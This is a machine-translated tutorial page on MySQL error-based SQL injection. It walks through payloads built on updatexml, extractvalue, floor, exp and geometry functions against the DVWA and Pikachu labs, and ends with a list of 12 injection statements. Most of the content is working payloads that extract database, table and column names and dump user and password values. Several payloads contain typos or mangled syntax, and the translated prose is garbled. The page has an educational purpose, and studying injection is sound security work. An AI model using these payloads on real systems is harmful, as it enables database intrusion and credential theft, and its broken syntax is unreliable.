当前位置:网站首页>SQL injection error report injection function graphic explanation
SQL injection error report injection function graphic explanation
2022-07-07 21:13:00 【1024 questions】
Preface
Commonly used error reporting function
Usage details
updatexml() function
example
extractvalue() function
floor() function
exp() function
12 An error reporting injection function
summary
PrefaceThe premise of error injection is that when the statement has errors , The error message is output to the front end . The reason for the vulnerability is that developers use print_r (),mysql_error(),mysqli_connect_error() Function will mysql The error information is output to the front end , So you can close the original statement , Execute the following statement .
Commonly used error reporting functionUsage details updatexml() functionupdatexml() yes mysql Yes xml Document data for query and modification xpath function
extractvalue() yes mysql Yes xml Document data for query xpath function
floor() mysql The function used to round in
exp() This function returns e( The base of natural logarithm ) Index X The power of
updatexml() The function is to change ( Find and replace )xml The value of the eligible node in the document
grammar :updatexml(xml_document,XPthstring,new_value)
The first parameter is the string string(XML The name of the document object )
The second parameter is to specify a location in the string (Xpath Format string )
The third parameter is what to replace with ,string Format
Xpath Positioning must be effective , Otherwise, there will be mistakes . We can use this feature to break out the data we want
exampleRegistration is to add data to the database ,insert.
Type single quotes... At the user Report errors
Guess the back-end statement
insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)Can be in xxx Close single quotation marks at , Reveal the data we want
?id=1' or updatexml(0,concat(0x7e,select database()),1)'Closing single quotation marks makes the statement escape , Then reconstruct the statement query , The name of blasting warehouse is :"pikachu"
The analysis process
When the input payload
?id=1' or updatexml(0,concat(0x7e,select database()),1)or'The back end will be spliced into
insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',The table name and column name fields are the same as normal queries, but they have changed their positions
Use process
Library name
1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#Table name
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #Table lookup information ( Suppose there is a users surface , The library is dvwa
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #Check the field value ( Suppose the field name is last_name(dvwa.users It means to call dvwa Library users surface )
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #extractvalue() function extractvalue() The function from the target xml Returns the string containing the value of the query
extractvalue (XML_document, XPath_string);
The first parameter :XML_document yes String Format , by XML The name of the document object , In this paper, for doc
The second parameter :XPath_string(Xpath Format string ),Xpath Positioning must be effective , Otherwise, there will be mistakes
structure payload
?id=1' or extracrvalue(0,concat(0x7e,database())) or '
Be careful xpath Echo has only one use limit Functions explode one by one , And the longest is 32 position , exceed 32 The position can't explode
Use process
Current library
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #Current table
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #Table information ( Suppose the table is users
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #field value ( Field is user_id,first_name,last_name,(dvwa.users It means to call dvwa Library users surface )
1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #floor() function floor() yes mysql An integral function of
Library name
id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #Table name ( The library is dvwa, By modifying the limit 0,1 Value increment lookup table , limit 1,1、limit 2,1
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#Field name ( library :dvwa, surface :users
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#field value ( field value :user,password(dvwa.users It means to call dvwa library users surface
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#exp() function When passing a greater than 709 The value of , function exp() It will cause an overflow error .
Library name
id=1' or exp(~(SELECT * from(select database())a)) or 'Table name ( Library name :pikachu
id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or 'Field name ( Table name :users
id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or 'field value ( Field name :password, Table name :users
id=1' or wzp(~(select * from(select password from users limit 0,1)a)) or '12 An error reporting injection function 1、 adopt floor Report errors , The injection statement is as follows :
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、 adopt extractvalue Report errors , The injection statement is as follows :
and (extractvalue(1,concat(0x7e,(select user()),0x7e)));3、 adopt updatexml Report errors , The injection statement is as follows :
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));4、 adopt exp Report errors , The injection statement is as follows :
and exp(~(select * from (select user () ) a) );5、 adopt join Report errors , The injection statement is as follows :
select * from(select * from mysql.user ajoin mysql.user b)c;6、 adopt NAME_CONST Report errors , The injection statement is as follows :
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);7、 adopt GeometryCollection() Report errors , The injection statement is as follows :
and GeometryCollection(()select *from(select user () )a)b );8、 adopt polygon () Report errors , The injection statement is as follows :
and polygon (()select * from(select user ())a)b );9、 adopt multipoint () Report errors , The injection statement is as follows :
and multipoint (()select * from(select user() )a)b );10、 adopt multlinestring () Report errors , The injection statement is as follows :
and multlinestring (()select * from(selectuser () )a)b );11、 adopt multpolygon () Report errors , The injection statement is as follows :
and multpolygon (()select * from(selectuser () )a)b );12、 adopt linestring () Report errors , The injection statement is as follows :
and linestring (()select * from(select user() )a)b ); summary This is about SQL This is the end of the article on injecting the error reporting injection function , More about SQL Please search the previous articles of software development network or continue to browse the relevant articles below for the content of injection error reporting and injection function. I hope you will support software development network more in the future !
边栏推荐
- 阿洛的烦恼
- Apifox interface integrated management new artifact
- 恶魔奶爸 指南帖——简易版
- [matrix multiplication] [noi 2012] [cogs963] random number generator
- 使用高斯Redis实现二级索引
- 阿里云有奖体验:如何通过ECS挂载NAS文件系统
- 程序猿赚的那点钱算个P啊!
- Do you have to make money in the account to open an account? Is the fund safe?
- Phoenix JDBC
- Unity3d 4.3.4f1 execution project
猜你喜欢
C语言 整型 和 浮点型 数据在内存中存储详解(内含原码反码补码,大小端存储等详解)
Ubuntu安装mysql8遇到的问题以及详细安装过程
Optimization cases of complex factor calculation: deep imbalance, buying and selling pressure index, volatility calculation
How to meet the dual needs of security and confidentiality of medical devices?
Mysql子查询关键字的使用方式(exists)
H3C s7000/s7500e/10500 series post stack BFD detection configuration method
CodeSonar网络研讨会
解决使用uni-app MediaError MediaError ErrorCode -5
Klocwork code static analysis tool
SQL注入报错注入函数图文详解
随机推荐
npm uninstall和rm直接删除的区别
Micro service remote debug, nocalhost + rainbow micro service development second bullet
Measure the height of the building
AADL Inspector 故障树安全分析模块
easyui 日期控件清空值
Codeforces 474 F. Ant colony
Data sorting in string
死锁的产生条件和预防处理[通俗易懂]
目标:不排斥 yaml 语法。争取快速上手
软件缺陷静态分析 CodeSonar 5.2 新版发布
2022年在启牛开中银股票的账户安全吗?
Write a jump table
C语言多角度帮助你深入理解指针(1. 字符指针2. 数组指针和 指针数组 、数组传参和指针传参3. 函数指针4. 函数指针数组5. 指向函数指针数组的指针6. 回调函数)
Helix QAC 2020.2新版静态测试工具,最大限度扩展了标准合规性的覆盖范围
刚开户的能买什么股票呢?炒股账户安全吗
Alibaba cloud award winning experience: how to mount NAS file system through ECS
201215-03-19—cocos2dx内存管理–具体解释「建议收藏」
Addition, deletion, modification and query of sqlhelper
写一下跳表
Details of C language integer and floating-point data storage in memory (including details of original code, inverse code, complement, size end storage, etc.)